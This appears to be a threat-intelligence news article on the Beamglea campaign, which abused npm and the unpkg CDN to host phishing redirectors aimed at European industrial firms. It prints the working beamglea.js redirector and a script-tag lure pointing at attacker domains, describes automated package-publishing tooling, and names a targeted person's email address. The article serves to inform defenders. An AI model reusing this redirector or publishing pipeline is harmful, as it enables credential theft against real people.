Beamglea Campaign: Hackers Abuse 175 npm Packages and unpkg CDN for Large-Scale Phishing

Socket’s Threat Research Team has uncovered a massive supply-chain abuse campaign leveraging npm’s public registry and unpkg.com’s CDN as free hosting infrastructure for phishing attacks. The operation — tracked under the codename “Beamglea” — involves 175 malicious npm packages that have collectively accumulated over 26,000 downloads, and targeted more than 135 organizations across the industrial, energy, and technology sectors worldwide.

Unlike traditional supply chain attacks that infect developers’ systems through malicious code execution, Beamglea takes a subtler approach. The npm packages themselves are non-executable, but instead exploit npm’s hosting and delivery mechanisms to store and serve redirect scripts that forward unsuspecting users to credential-harvesting pages hosted on attacker-controlled domains.

“The npm packages themselves don’t execute malicious code when installed via npm install. Instead, they exploit npm as free, global hosting infrastructure for phishing attacks,” the report explains.

Each package follows a naming convention like redirect-[a-z0-9]{6} — for example, redirect-nf0qo1 or redirect-xs13nr — and contains a single malicious JavaScript file, beamglea.js, hosted automatically on unpkg.com, a legitimate CDN that mirrors npm packages over HTTPS.

When a victim opens a phishing lure, such as an HTML “invoice” or “purchase order,” it loads the script directly from unpkg:

<script src="https://unpkg.com/redirect-xs13nr@1.0.0/beamglea.js"></script>

This abuse of trusted, developer-centric infrastructure allows the campaign to bypass most web filters and SSL certificate verification mechanisms.

“The threat actors abuse this trusted infrastructure to host their phishing components without paying for servers or SSL certificates,” Socket noted.

Beamglea’s operators built automated Python tooling to mass-produce and publish the malicious packages. Each run of the tool generated a random package name, injected victim-specific data such as email addresses and phishing URLs into a JavaScript template, and then published it to npm automatically.

“The automation takes three inputs: a JavaScript template file (beamglea_template.js), the victim’s email address, and the phishing URL. It then authenticates to npm, processes templates, creates the package, publishes it, and generates an HTML lure,” the report revealed.

The code — which includes a redirect_generator.py script — can publish new packages under different npm accounts, creating fresh phishing infrastructure on demand.

This approach enabled rapid scaling:

• 175 packages published
• 9 npm author accounts used
• 630+ HTML phishing lures generated

Some packages even contained a cdn_setup_guide.txt, showing plans to migrate beyond npm to custom VPS-hosted CDNs, suggesting long-term operational intent.

“The presence of cdn_setup_guide.txt in some packages shows long-term planning,” Socket warned. “The guide provides instructions for setting up independent hosting infrastructure using VPS and Nginx, reducing reliance on unpkg.com’s CDN.”

At the heart of each Beamglea package lies beamglea.js, a deceptively simple redirector:

function processAndRedirect() {
    var email = "victim@company.com";  // Customized per target
    var urlPath = "https://cfn.jackpotmastersdanske.com/TJImeEKD";
    var finalUrl = urlPath + "#" + email;
    window.location.href = finalUrl;
}
processAndRedirect();

The script uses a clever evasion trick — appending the victim’s email after a # (URL fragment).
Because fragments are never sent in HTTP requests, they don’t appear in server logs or traffic captures, helping the attackers hide evidence while still allowing the phishing page’s JavaScript to read and pre-fill the victim’s email address.

“The script appends the victim’s email as a URL fragment… The phishing page reads the email from JavaScript context and pre-fills login forms, creating an appearance of legitimacy,” Socket explained.

These details enhance the realism of the phishing pages, making victims believe they are accessing a legitimate portal — such as Microsoft 365, SAP, or internal enterprise systems.

Socket identified over 630 HTML files embedded within the npm packages, themed as purchase orders, engineering drawings, and project documentation — a classic form of business email compromise (BEC) social engineering.

The phishing infrastructure was distributed across seven attacker-controlled domains, with the primary domain being:

• cfn.jackpotmastersdanske[.]com

Secondary infrastructure included domains such as:

• musicboxcr[.]com
• villasmbuva[.]co[.]mz
• cfn.notwinningbutpartici[.]com
• elkendinsc[.]com

Some URLs carried base64-encoded tracking parameters revealing the campaign’s operational details — including Office 365 variants targeting non-MFA users.

“The o365_1_nom parameter indicates the phishing pages specifically target Office 365 accounts without multi-factor authentication enabled,” Socket observed.

The Beamglea campaign’s targeting is unusually focused for a phishing operation. Socket found 135 unique email addresses tied to over 100 organizations, mainly across Western Europe and Asia-Pacific.

Breakdown by sector:

• Industrial Manufacturing (35%) – ArcelorMittal, Demag Cranes, Stratasys, Algodue
• Technology & Networking (20%) – D-Link, Moxa, Renishaw
• Energy & Chemical (15%) – Sasol, ThyssenKrupp Nucera, H2 Systems

Notably, U.S.-based targets were absent, suggesting a regionally constrained campaign, possibly operated from Europe or Asia.

“Geographic targeting focused heavily on Western Europe (Germany, Netherlands, Belgium, Italy) with secondary focus on Nordic countries and Asia-Pacific. Notably absent were US-based targets,” the report confirmed.

One Croatian industrial contact — sraka@hust.hr — appeared in 19 separate packages, indicating either a high-value target or persistent phishing attempts.

While earlier npm threats injected malware directly into development environments, this campaign weaponized npm’s trust and ubiquity to host phishing infrastructure at scale, bypassing security controls by leveraging legitimate domains and SSL certificates.

Related Posts:

• Malicious npm Packages Exploiting Typosquatting to Inject SSH Backdoors
• Malicious npm Packages Backdoor Telegram Bot Developers
• CDN Solution Traffic Control Upgraded to Apache Top-Level Project
• Malicious npm Packages Threaten Crypto Developers: Keylogging and Wallet Theft Revealed
• Sophisticated Phishing Campaign Abuses Webflow CDN to Steal Credit Card Data

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy